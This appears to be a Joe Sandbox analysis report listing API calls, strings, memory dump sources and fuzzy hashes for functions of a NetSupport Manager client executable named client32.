                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle_memset$ClassCodeCursorExitFromNameObjectOpenPointProcessSingleVersionWaitWindow_strncpywsprintf
                                                                                • String ID: Error. ExitMetro code cannot init kbfilter$Error. WindowsD not generated$Exit Win10 Start screen (%s)
                                                                                • API String ID: 2171401249-3225996774
                                                                                • Opcode ID: 64892938fa0b6c1ee6d66ac4cfd7e9802a1b46fe4b434297f23fe30ead13f557
                                                                                • Instruction ID: fa832722e0390e9f8a25bf370b451ec2a36a1e68e963bc0416f7044736d9f8e9
                                                                                • Opcode Fuzzy Hash: 64892938fa0b6c1ee6d66ac4cfd7e9802a1b46fe4b434297f23fe30ead13f557
                                                                                • Instruction Fuzzy Hash: CD31297AD14219AFE715CFD49C417AEB7F8DB45619F0042AADC15937C0EB316500CBD1
                                                                                APIs
                                                                                • _memmove.LIBCMT ref: 110D1378
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                • String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
                                                                                • API String ID: 1528188558-323366856
                                                                                • Opcode ID: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
                                                                                • Instruction ID: ca0f400cc3ae87bce4a96c7d882a21a9a029a19775e55ac1937322abd3584148
                                                                                • Opcode Fuzzy Hash: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
                                                                                • Instruction Fuzzy Hash: 0C212639B007566BDB01CF99EC90F9AF3E5AFD1288F048469E99997701EE31F4058398
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,0000000E), ref: 11160E88
                                                                                  • Part of subcall function 11160D17: RegOpenKeyExA.ADVAPI32(80000000,CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32,00000000,00020019,?,?), ref: 11160D4F
                                                                                  • Part of subcall function 11160D17: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?), ref: 11160D90
                                                                                  • Part of subcall function 11160D17: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 11160DB4
                                                                                  • Part of subcall function 11160D17: RegCloseKey.ADVAPI32(?), ref: 11160DE1
                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?), ref: 11160E4A
                                                                                • LoadLibraryA.KERNEL32(hhctrl.ocx,?,?,?,?), ref: 11160E60
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad$AddressCloseEnvironmentExpandOpenProcQueryStringsValue
                                                                                • String ID: hhctrl.ocx
                                                                                • API String ID: 1060647816-2298675154
                                                                                • Opcode ID: 1515c5a980bb63e1af7bf7099e432547b006d5e2aeed3d9808fec87a56ded119
                                                                                • Instruction ID: 29a85e5adb823bcef9c03dae075ae2b4ea3bdd8fdf15b4c5e271eae4de8d38be
                                                                                • Opcode Fuzzy Hash: 1515c5a980bb63e1af7bf7099e432547b006d5e2aeed3d9808fec87a56ded119
                                                                                • Instruction Fuzzy Hash: DF118E7170423A9BDB05CFA9CD90AAAF7BCEB4C708B00047DE511D3244EBB2E958CB50
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 11005981
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 110059BC
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastMessageProcessReleasewsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 3704029381-2830328467
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,1103FE35,?,?,Client,DisableThumbnail,00000000,00000000,Client,DisableWatch,00000000,00000000), ref: 1105D51E
                                                                                • LeaveCriticalSection.KERNEL32(00000000,?,DisableWatch,00000000,00000000,1B702977), ref: 1105D59E
                                                                                • SetEvent.KERNEL32(?,?,DisableWatch,00000000,00000000,1B702977), ref: 1105D5A8
                                                                                Strings
                                                                                • Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d, xrefs: 1105D561
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterEventLeave
                                                                                • String ID: Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d
                                                                                • API String ID: 3094578987-11999416
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID: Client$DeleteTempUdpFile %s$ImpersonateNetworkDrives
                                                                                • API String ID: 269201875-4101313740
                                                                                APIs
                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B969F
                                                                                • MoveWindow.USER32(8D111949,?,?,?,?,00000001,?,?,?,?,?,?,?,?,?,110BA885), ref: 110B96D8
                                                                                • SetTimer.USER32(8D111949,0000050D,000007D0,00000000), ref: 110B9710
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoMoveParametersSystemTimerWindow
                                                                                • String ID: Max
                                                                                • API String ID: 1521622399-2772132969
                                                                                APIs
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • SendMessageA.USER32(?,000004FF,00000000,00000000), ref: 111258C5
                                                                                • DestroyWindow.USER32(?,00000000,00000000,00000000,00000000,View,BlankAll,00000000,00000000,00000004,00000000,?,?,11125C22,00000000,?), ref: 111258D9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DestroyMessageSendWindow__wcstoi64
                                                                                • String ID: BlankAll$View
                                                                                • API String ID: 321412109-3798095874
                                                                                APIs
                                                                                • _memmove.LIBCMT ref: 111535AC
                                                                                • _memmove.LIBCMT ref: 111535E6
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memmove$ErrorExitLastMessageProcesswsprintf
                                                                                • String ID: ..\ctl32\WCUNPACK.C$n > 128
                                                                                • API String ID: 6605023-1396654219
                                                                                APIs
                                                                                • InterlockedIncrement.KERNEL32(111F1BC0), ref: 111398B1
                                                                                Strings
                                                                                • Initing VolumeControl Subsystem..., xrefs: 11139898
                                                                                • Inited VolumeControl Subsystem (OK: Ref's already exist)., xrefs: 11139936
                                                                                • Inited VolumeControl Subsystem (OK: 1 Ref)., xrefs: 111398DA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: IncrementInterlocked
                                                                                • String ID: Inited VolumeControl Subsystem (OK: 1 Ref).$Inited VolumeControl Subsystem (OK: Ref's already exist).$Initing VolumeControl Subsystem...
                                                                                • API String ID: 3508698243-2739245937
                                                                                APIs
                                                                                • GetDlgItem.USER32(00000000,00000001), ref: 110395E6
                                                                                • EnableWindow.USER32(00000000,00000000), ref: 110395EE
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                • API String ID: 1136984157-1986719024
                                                                                • Opcode ID: 9301bb4a703dc9f718e6a03bc63426bc399485c21c7871a03d02741ec2ccad78
                                                                                • Instruction ID: 55b3f6273447a840922a2276b3415970a39c2bc3f54fc53508d86eb1e8118ba0
                                                                                • Opcode Fuzzy Hash: 9301bb4a703dc9f718e6a03bc63426bc399485c21c7871a03d02741ec2ccad78
                                                                                • Instruction Fuzzy Hash: C3F0C876640219BFD710CE55DCC6F9BB39CEB88754F108425F61597280D6B1E84087A4
                                                                                APIs
                                                                                • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 110AB01D
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                • String ID: ..\ctl32\liststat.cpp$..\ctl32\listview.cpp$m_hWnd
                                                                                • API String ID: 819365019-2727927828
                                                                                • Opcode ID: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
                                                                                • Instruction ID: c68bebcfb275c132091ba8ffe4505af5196cb7164de974b36e44453814cc3cc0
                                                                                • Opcode Fuzzy Hash: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
                                                                                • Instruction Fuzzy Hash: 4DF02B34FC0720AFD720D581EC42FCAB3D4AB05709F004469F5562A2D1E5B0B8C0C7D1
                                                                                APIs
                                                                                • IsWindow.USER32(?), ref: 110ED498
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastMessageProcessWindowwsprintf
                                                                                • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$lpNmHdr!=0
                                                                                • API String ID: 2577986331-1331251348
                                                                                • Opcode ID: 7e39479067b6c5f95eacce72c06cd62ac8a6f0ae8e6ec8608ac651044464dd8e
                                                                                • Instruction ID: 93283a680bb1c801d139a1839617fb2f1f19efec68c8bcedb592c4b0da2aa86f
                                                                                • Opcode Fuzzy Hash: 7e39479067b6c5f95eacce72c06cd62ac8a6f0ae8e6ec8608ac651044464dd8e
                                                                                • Instruction Fuzzy Hash: 8DF0E279E036327BD612A9177C0AFCFF768DBA1AA9F058061F80D26101EB34720082E9
                                                                                APIs
                                                                                  • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F466
                                                                                  • Part of subcall function 1103F450: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F47C
                                                                                  • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F484
                                                                                  • Part of subcall function 1103F450: Sleep.KERNEL32(00000014), ref: 1103F497
                                                                                  • Part of subcall function 1103F450: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F4A7
                                                                                  • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F4AF
                                                                                • IsWindow.USER32(00000000), ref: 1103F4EA
                                                                                • SendMessageA.USER32(00000000,0000004A,00000000,00000501), ref: 1103F4FD
                                                                                Strings
                                                                                • DoMMData - could not find %s window, xrefs: 1103F50D
                                                                                • PCIVideoSlave32, xrefs: 1103F508
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$Find$MessageSendSleep
                                                                                • String ID: DoMMData - could not find %s window$PCIVideoSlave32
                                                                                • API String ID: 1010850397-3146847729
                                                                                • Opcode ID: aae4a453ef0a99841fb0c8f2bdb4662e73cf68ed11950b93a08a3e71c3a39851
                                                                                • Instruction ID: 9c7747beff98129d0e206a6ba61550f1bc8c1a2fc0044bc1d9efbb7d24d88507
                                                                                • Opcode Fuzzy Hash: aae4a453ef0a99841fb0c8f2bdb4662e73cf68ed11950b93a08a3e71c3a39851
                                                                                • Instruction Fuzzy Hash: BBF02735E8121C77D710AA98AC0ABEEBB689B0170EF004098ED1966280EBB5251087DB
                                                                                APIs
                                                                                • _free.LIBCMT ref: 110816D7
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastMessageProcess_freewsprintf
                                                                                • String ID: ..\CTL32\DataStream.cpp$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                • API String ID: 2441568934-1875806619
                                                                                • Opcode ID: 447824e72cda998df234909720421efff22f71a3ff5c8715bed7def871f972f3
                                                                                • Instruction ID: 681d8586094b0eb4f99e23d602ddbaf233b7ff3414f9fb7bc0106feac7c5022a
                                                                                • Opcode Fuzzy Hash: 447824e72cda998df234909720421efff22f71a3ff5c8715bed7def871f972f3
                                                                                • Instruction Fuzzy Hash: E8F027B8F083221FEA30DE54BC02BC9F7D01F0824CF080494E9C327240E7B26818C6E2
                                                                                APIs
                                                                                • GetDeviceCaps.GDI32(?,0000000E), ref: 110EFB32
                                                                                • GetDeviceCaps.GDI32(?,0000000C), ref: 110EFB39
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CapsDevice$ErrorExitLastMessageProcesswsprintf
                                                                                • String ID: ..\CTL32\pcibmp.cpp$nColors
                                                                                • API String ID: 2713834284-4292231205
                                                                                • Opcode ID: c8878a077f428f9bb25e6d41f0c44af9662807efe6cd3c41329cf584f49568f3
                                                                                • Instruction ID: cfed96a02f924fb25650393b30a092bd0643f011e0ddcc2ee79cac053fdacdf4
                                                                                • Opcode Fuzzy Hash: c8878a077f428f9bb25e6d41f0c44af9662807efe6cd3c41329cf584f49568f3
                                                                                • Instruction Fuzzy Hash: 4AE04F23F4123937EA11659AAC46FCAF79C9B867A8F0201B2FA04FB392E5D16C0446D5
                                                                                APIs
                                                                                  • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,757323A0,1100BF7B), ref: 11110928
                                                                                  • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935
                                                                                • _free.LIBCMT ref: 1103D221
                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                  • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010,?), ref: 11110970
                                                                                • SetPriorityClass.KERNEL32(?,?), ref: 1103D24C
                                                                                • MessageBeep.USER32(00000000), ref: 1103D25E
                                                                                Strings
                                                                                • Show has overrun too much, aborting, xrefs: 1103D1F1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$BeepClassEnterErrorFreeHeapLastMessagePriority_free
                                                                                • String ID: Show has overrun too much, aborting
                                                                                • API String ID: 304545663-4092325870
                                                                                APIs
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • CreateThread.KERNEL32(00000000,00001000,11135700,00000000,00000000,1114239E), ref: 11135874
                                                                                • CloseHandle.KERNEL32(00000000,?,?,1114239E,?,?,?,00000000,?), ref: 1113587B
                                                                                Similarity
                                                                                • API ID: CloseCreateHandleThread__wcstoi64
                                                                                • String ID: UnresponsiveTime$_debug
                                                                                • API String ID: 3257255551-835906747
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,?), ref: 1101D3EB
                                                                                • EnableWindow.USER32(00000000,?), ref: 1101D3F6
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Similarity
                                                                                • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                • API String ID: 1136984157-1986719024
                                                                                Similarity
                                                                                • API ID: EnumExitSleepThreadWindows
                                                                                • String ID: TapiFix
                                                                                • API String ID: 1804117399-2824097521
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,?), ref: 1101D43F
                                                                                • ShowWindow.USER32(00000000), ref: 1101D446
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Similarity
                                                                                • API ID: ErrorExitItemLastMessageProcessShowWindowwsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                • API String ID: 1319256379-1986719024
                                                                                APIs
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • std::exception::exception.LIBCMT ref: 1100BBF0
                                                                                • __CxxThrowException@8.LIBCMT ref: 1100BC05
                                                                                • std::exception::exception.LIBCMT ref: 1100BC14
                                                                                • __CxxThrowException@8.LIBCMT ref: 1100BC29
                                                                                Similarity
                                                                                • API ID: Exception@8Throwstd::exception::exception$_malloc_memsetwsprintf
                                                                                • String ID:
                                                                                • API String ID: 1651403513-0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
